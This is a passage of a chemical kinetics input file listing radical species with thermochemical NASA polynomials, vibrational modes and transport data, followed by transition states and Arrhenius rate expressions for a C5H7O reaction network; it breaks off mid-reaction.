thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.48423,0.0580753,-6.45425e-05,4.11885e-08,-1.09143e-11,82996.1,25.8786], Tmin=(100,'K'), Tmax=(906.473,'K')), NASAPolynomial(coeffs=[8.75212,0.0260042,-1.14723e-05,2.15791e-09,-1.49873e-13,81678.5,-8.47106], Tmin=(906.473,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(689.335,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(270.22,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsOs) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(Cds_P) + radical(Cds_S) + radical(C=CC(C)(O)CJ) + radical(C=CC(C)2OJ)"""),
)
species(
label = '[CH]=[C]C([CH2])([CH2])[O](10607)',
structure = SMILES('[CH]=[C]C([CH2])([CH2])[O]'),
E0 = (902.779,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1685,370,3000,3033.33,3066.67,3100,415,465,780,850,1435,1475,900,1100,3120,650,792.5,1650,323.267,323.276,323.292,323.296,323.33,2447.34],'cm^-1')),
HinderedRotor(inertia=(0.00161275,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0754417,'amu*angstrom^2'), symmetry=1, barrier=(5.59538,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.560711,'amu*angstrom^2'), symmetry=1, barrier=(41.5871,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 6,
opticalIsomers = 1,
molecularWeight = (81.0926,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.21071,0.0659442,-9.73829e-05,7.98066e-08,-2.60472e-11,108675,27.0341], Tmin=(100,'K'), Tmax=(832.904,'K')), NASAPolynomial(coeffs=[8.74506,0.0238358,-1.08787e-05,2.02702e-09,-1.37856e-13,107626,-6.70352], Tmin=(832.904,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(902.779,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(245.277,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsOs) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(Cds_P) + radical(C=CC(C)(O)CJ) + radical(Cds_S) + radical(C=CC(C)(O)CJ) + radical(C=CC(C)2OJ)"""),
)
species(
label = '[CH][CH]CC(=C)[O](6535)',
structure = SMILES('[CH][CH]CC(=C)[O]'),
E0 = (525.606,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,2950,3100,1380,975,1025,1650,350,440,435,1725,3025,407.5,1350,352.5,432.682,434.839,435.426,440.02,2066.26,2067.16],'cm^-1')),
HinderedRotor(inertia=(0.000853968,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.000852283,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0419231,'amu*angstrom^2'), symmetry=1, barrier=(5.71597,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (82.1005,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.57858,0.0523444,-4.95585e-05,2.63723e-08,-5.77379e-12,63303.7,26.3127], Tmin=(100,'K'), Tmax=(1093.65,'K')), NASAPolynomial(coeffs=[9.68531,0.0226937,-8.89017e-06,1.58129e-09,-1.06645e-13,61530.6,-13.5231], Tmin=(1093.65,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(525.606,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(270.22,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-(Cds-Cd)H) + group(Cs-CsCsHH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsHHH) + group(Cds-CdsCsOs) + group(Cds-CdsHH) + radical(CCJ2_triplet) + radical(C=C(C)OJ) + radical(RCCJC)"""),
)
species(
label = '[CH]=CC1([CH2])CO1(9310)',
structure = SMILES('[CH]=CC1([CH2])CO1'),
E0 = (409.021,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3120,650,792.5,1650,2750,3150,900,1100,3010,987.5,1337.5,450,1655,3000,3100,440,815,1455,1000,200,800,914.286,1028.57,1142.86,1257.14,1371.43,1485.71,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (82.1005,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(3445.77,'J/mol'), sigma=(6.00934,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=538.22 K, Pc=36.03 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.397019,0.0636525,-6.7483e-05,3.67607e-08,-7.35297e-12,49337.1,23.9878], Tmin=(100,'K'), Tmax=(1495.18,'K')), NASAPolynomial(coeffs=[13.9339,0.0117614,3.0255e-07,-4.75729e-10,4.56109e-14,47041.3,-40.905], Tmin=(1495.18,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(409.021,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(274.378,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-(Cds-Cds)CsCsOs) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + ring(Ethylene_oxide) + radical(CJC(C)OC) + radical(Cds_P)"""),
)
species(
label = '[CH]=CC1([O])CC1(10608)',
structure = SMILES('[CH]=CC1([O])CC1'),
E0 = (400.647,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (82.1005,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.0236,0.0293171,2.90458e-05,-6.11417e-08,2.61358e-11,48270.6,22.1375], Tmin=(100,'K'), Tmax=(957.69,'K')), NASAPolynomial(coeffs=[13.6268,0.0159885,-5.10864e-06,9.41844e-10,-7.08957e-14,44436.9,-41.7518], Tmin=(957.69,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(400.647,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(278.535,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsOs) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + ring(Cyclopropane) + radical(C=CC(C)2OJ) + radical(Cds_P)"""),
)
species(
label = '[CH2]C1([CH2])C=CO1(10601)',
structure = SMILES('[CH2]C1([CH2])C=CO1'),
E0 = (334.703,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (82.1005,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.743746,0.0528084,-1.44815e-06,-5.91922e-08,3.36566e-11,40390.4,19.4994], Tmin=(100,'K'), Tmax=(901.222,'K')), NASAPolynomial(coeffs=[24.7252,-0.00244371,5.31674e-06,-1.17298e-09,7.92058e-14,33989.2,-105.236], Tmin=(901.222,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(334.703,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(274.378,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-Cs(Cds-Cd)) + group(Cs-(Cds-Cds)CsCsOs) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsOsH) + ring(Cyclobutene) + radical(CJC(C)OC) + radical(CJC(C)OC)"""),
)
species(
label = '[CH2]C1([O])C=CC1(10609)',
structure = SMILES('[CH2]C1([O])C=CC1'),
E0 = (365.387,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (82.1005,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.07739,0.0294263,2.52769e-05,-5.39833e-08,2.26964e-11,44026.6,21.3925], Tmin=(100,'K'), Tmax=(971.675,'K')), NASAPolynomial(coeffs=[12.3604,0.0185831,-6.59314e-06,1.23332e-09,-9.08144e-14,40541.8,-35.5708], Tmin=(971.675,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(365.387,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(278.535,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsOs) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsCsH) + ring(Cyclobutene) + radical(C=CC(C)(O)CJ) + radical(C=CC(C)2OJ)"""),
)
species(
label = '[CH]C=C([CH2])[CH2](6422)',
structure = SMILES('[CH]C=C([CH2])[CH2]'),
E0 = (604.726,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3033.33,3066.67,3100,415,465,780,850,1435,1475,900,1100,350,440,435,1725,3010,987.5,1337.5,450,1655,394.679,394.68,394.681],'cm^-1')),
HinderedRotor(inertia=(0.458026,'amu*angstrom^2'), symmetry=1, barrier=(50.6299,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.458023,'amu*angstrom^2'), symmetry=1, barrier=(50.6299,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.458025,'amu*angstrom^2'), symmetry=1, barrier=(50.6299,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (66.1011,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.81611,0.0388094,1.79234e-07,-2.5992e-08,1.22401e-11,72818.5,19.2374], Tmin=(100,'K'), Tmax=(992.533,'K')), NASAPolynomial(coeffs=[10.7608,0.0238542,-9.09622e-06,1.64932e-09,-1.15256e-13,70004,-29.0822], Tmin=(992.533,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(604.726,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(245.277,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + group(Cds-CdsCsH) + radical(Allyl_P) + radical(Allyl_P) + radical(AllylJ2_triplet)"""),
)
species(
label = '[CH]C=C([CH2])[O](5297)',
structure = SMILES('[CH]C=C([CH2])[O]'),
E0 = (422.945,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3100,440,815,1455,1000,350,440,435,1725,3010,987.5,1337.5,450,1655,416.371,416.371,416.372,416.375],'cm^-1')),
HinderedRotor(inertia=(0.422129,'amu*angstrom^2'), symmetry=1, barrier=(51.9295,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.42211,'amu*angstrom^2'), symmetry=1, barrier=(51.9295,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (68.074,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.98261,0.0391897,-2.01089e-05,-4.46475e-09,5.74562e-12,50946,19.5699], Tmin=(100,'K'), Tmax=(919.32,'K')), NASAPolynomial(coeffs=[10.2652,0.0166702,-5.4224e-06,8.8031e-10,-5.76775e-14,48851.9,-22.799], Tmin=(919.32,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(422.945,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(199.547,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-(Cds-Cd)H) + group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsOs) + group(Cds-CdsCsH) + radical(C=C(C)OJ) + radical(AllylJ2_triplet) + radical(C=C(O)CJ)"""),
)
species(
label = '[CH]C([CH2])([O])C=[CH](10610)',
structure = SMILES('[CH]C([CH2])([O])C=[CH]'),
E0 = (899.709,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3120,650,792.5,1650,3010,987.5,1337.5,450,1655,3000,3100,440,815,1455,1000,200,800,914.286,1028.57,1142.86,1257.14,1371.43,1485.71,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 6,
opticalIsomers = 1,
molecularWeight = (81.0926,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.40315,0.0573341,-6.24064e-05,3.60612e-08,-8.37485e-12,108303,26.6946], Tmin=(100,'K'), Tmax=(1043.2,'K')), NASAPolynomial(coeffs=[11.1927,0.0197972,-8.43218e-06,1.56822e-09,-1.08649e-13,106261,-20.9484], Tmin=(1043.2,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(899.709,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(245.277,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsOs) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(C=CC(C)(O)CJ) + radical(C=CC(C)2OJ) + radical(CCJ2_triplet) + radical(Cds_P)"""),
)
species(
label = '[C]=CC([CH2])([CH2])[O](10611)',
structure = SMILES('[C]=CC([CH2])([CH2])[O]'),
E0 = (975.943,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3033.33,3066.67,3100,415,465,780,850,1435,1475,900,1100,3010,987.5,1337.5,450,1655,200,800,960,1120,1280,1440,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 6,
opticalIsomers = 1,
molecularWeight = (81.0926,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.29535,0.0640225,-9.25083e-05,7.58144e-08,-2.50647e-11,117472,26.2319], Tmin=(100,'K'), Tmax=(806.771,'K')), NASAPolynomial(coeffs=[8.28829,0.0249368,-1.16298e-05,2.199e-09,-1.51258e-13,116487,-5.11314], Tmin=(806.771,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(975.943,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(245.277,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsOs) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(C=CC(C)(O)CJ) + radical(C=CC(C)(O)CJ) + radical(C=CC(C)2OJ) + radical(CdCdJ2_triplet)"""),
)
species(
label = 'N2',
structure = SMILES('N#N'),
E0 = (-8.64289,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (28.0135,'amu'),
collisionModel = TransportData(shapeIndex=1, epsilon=(810.913,'J/mol'), sigma=(3.621,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(1.76,'angstroms^3'), rotrelaxcollnum=4.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.53101,-0.000123661,-5.02999e-07,2.43531e-09,-1.40881e-12,-1046.98,2.96747], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.95258,0.0013969,-4.92632e-07,7.8601e-11,-4.60755e-15,-923.949,5.87189], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-8.64289,'kJ/mol'), Cp0=(29.1007,'J/(mol*K)'), CpInf=(37.4151,'J/(mol*K)'), label="""N2""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = 'Ne',
structure = SMILES('[Ne]'),
E0 = (-6.19738,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (20.1797,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1235.53,'J/mol'), sigma=(3.758e-10,'m'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with fixed Lennard Jones Parameters. This is the fallback method! Try improving transport databases!"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-6.19738,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""Ne""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = 'He',
structure = SMILES('[He]'),
E0 = (-6.19738,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (4.0026,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(84.8076,'J/mol'), sigma=(2.576,'angstroms'), dipoleMoment=(0,'De'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""NOx2018"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,0.928724], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,0.928724], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-6.19738,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""He""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = 'Ar',
structure = SMILES('[Ar]'),
E0 = (-6.19738,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (39.348,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1134.93,'J/mol'), sigma=(3.33,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,4.37967], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,4.37967], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-6.19738,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""Ar""", comment="""Thermo library: primaryThermoLibrary"""),
)
transitionState(
label = 'TS1',
E0 = (664.937,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS2',
E0 = (813.102,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS3',
E0 = (664.937,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS4',
E0 = (697.96,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS5',
E0 = (682.852,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS6',
E0 = (779.436,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS7',
E0 = (770.374,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS8',
E0 = (797.446,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS9',
E0 = (841.214,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS10',
E0 = (1073.51,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS11',
E0 = (1114.58,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS12',
E0 = (822.255,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS13',
E0 = (670.332,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS14',
E0 = (673.026,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS15',
E0 = (673.221,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS16',
E0 = (673.221,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS17',
E0 = (1011.61,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS18',
E0 = (838.631,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS19',
E0 = (1111.51,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS20',
E0 = (1187.75,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
reaction(
label = 'reaction1',
reactants = ['[CH]=CC([CH2])([CH2])[O](9680)'],
products = ['C#C(582)', '[CH2]C(=C)[O](4273)'],
transitionState = 'TS1',
kinetics = Arrhenius(A=(5e+12,'s^-1'), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""Exact match found for rate rule [RJJ]
Euclidian distance = 0
family: 1,4_Linear_birad_scission"""),
)
reaction(
label = 'reaction2',
reactants = ['H(8)', 'C#CC([CH2])([CH2])[O](10603)'],
products = ['[CH]=CC([CH2])([CH2])[O](9680)'],
transitionState = 'TS2',
kinetics = Arrhenius(A=(2.276e+10,'cm^3/(mol*s)'), n=1.103, Ea=(20.5476,'kJ/mol'), T0=(1,'K'), comment="""From training reaction 139 used for Ct-Cs_Ct-H;HJ
Exact match found for rate rule [Ct-Cs_Ct-H;HJ]
Euclidian distance = 0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction3',
reactants = ['CH2(T)(28)', '[CH]=CC(=C)[O](5179)'],
products = ['[CH]=CC([CH2])([CH2])[O](9680)'],
transitionState = 'TS3',
kinetics = Arrhenius(A=(53.4257,'m^3/(mol*s)'), n=1.6025, Ea=(18.6378,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [Cd_R;Y_1centerbirad] for rate rule [CO_O;CH2_triplet]
Euclidian distance = 1.41421356237
family: R_Addition_MultipleBond
Ea raised from -5.8 to 18.6 kJ/mol to match endothermicity of reaction."""),
)
reaction(
label = 'reaction4',
reactants = ['O(T)(63)', '[CH]=CC([CH2])=C(6418)'],
products = ['[CH]=CC([CH2])([CH2])[O](9680)'],
transitionState = 'TS4',
kinetics = Arrhenius(A=(53.4257,'m^3/(mol*s)'), n=1.6025, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Cds_Cds;O_atom_triplet]
Euclidian distance = 0
family: R_Addition_MultipleBond
Ea raised from -5.8 to 0 kJ/mol."""),
)
reaction(
label = 'reaction5',
reactants = ['[CH]=[CH](583)', '[CH2]C(=C)[O](4273)'],
products = ['[CH]=CC([CH2])([CH2])[O](9680)'],
transitionState = 'TS5',
kinetics = Arrhenius(A=(4679.9,'m^3/(mol*s)'), n=0.573452, Ea=(58.2237,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [CO_O;CJ]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction6',
reactants = ['C#C(582)', '[CH2][C]([CH2])[O](10271)'],
products = ['[CH]=CC([CH2])([CH2])[O](9680)'],
transitionState = 'TS6',
kinetics = Arrhenius(A=(46.4627,'m^3/(mol*s)'), n=1.51997, Ea=(27.4714,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Ct-H_Ct-H;CJ]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction7',
reactants = ['[CH]=CC([CH2])([CH2])[O](9680)'],
products = ['[CH2]C([CH2])([O])[C]=C(10604)'],
transitionState = 'TS7',
kinetics = Arrhenius(A=(1.08e+06,'s^-1'), n=1.99, Ea=(105.437,'kJ/mol'), T0=(1,'K'), comment="""From training reaction 17 used for R2H_D;Cd_rad_out_singleH;Cd_H_out_singleNd
Exact match found for rate rule [R2H_D;Cd_rad_out_singleH;Cd_H_out_singleNd]
Euclidian distance = 0
family: intra_H_migration"""),
)
reaction(
label = 'reaction8',
reactants = ['[CH]=[C]C([CH2])([CH2])O(10605)'],
products = ['[CH]=CC([CH2])([CH2])[O](9680)'],
transitionState = 'TS8',
kinetics = Arrhenius(A=(117344,'s^-1'), n=2.01217, Ea=(123.77,'kJ/mol'), T0=(1,'K'), comment="""Estimated using average of templates [R3H_SS_Cs;Y_rad_out;O_H_out] + [R3H_SS_Cs;Cd_rad_out;XH_out] for rate rule [R3H_SS_Cs;Cd_rad_out;O_H_out]
Euclidian distance = 1.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction9',
reactants = ['[CH]=[C]C([CH2])(C)[O](10606)'],
products = ['[CH]=CC([CH2])([CH2])[O](9680)'],
transitionState = 'TS9',
kinetics = Arrhenius(A=(2.304e+09,'s^-1'), n=1.24, Ea=(151.879,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""Estimated using an average for rate rule [R3H_SS_Cs;Cd_rad_out;Cs_H_out_2H]
Euclidian distance = 0
Multiplied by reaction path degeneracy 3.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction10',
reactants = ['[CH]=[CH](583)', '[CH2][C]([CH2])[O](10271)'],
products = ['[CH]=CC([CH2])([CH2])[O](9680)'],
transitionState = 'TS10',
kinetics = Arrhenius(A=(3.9578e+07,'m^3/(mol*s)'), n=-0.126319, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Y_rad;Y_rad]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: R_Recombination
Ea raised from -15.6 to -15.6 kJ/mol.
Ea raised from -15.6 to 0 kJ/mol."""),
)
reaction(
label = 'reaction11',
reactants = ['H(8)', '[CH]=[C]C([CH2])([CH2])[O](10607)'],
products = ['[CH]=CC([CH2])([CH2])[O](9680)'],
transitionState = 'TS11',
kinetics = Arrhenius(A=(4.34078e+06,'m^3/(mol*s)'), n=0.278577, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Y_rad;H_rad]
Euclidian distance = 0
family: R_Recombination
Ea raised from -1.4 to 0 kJ/mol."""),
)
reaction(
label = 'reaction12',
reactants = ['[CH]=CC([CH2])([CH2])[O](9680)'],
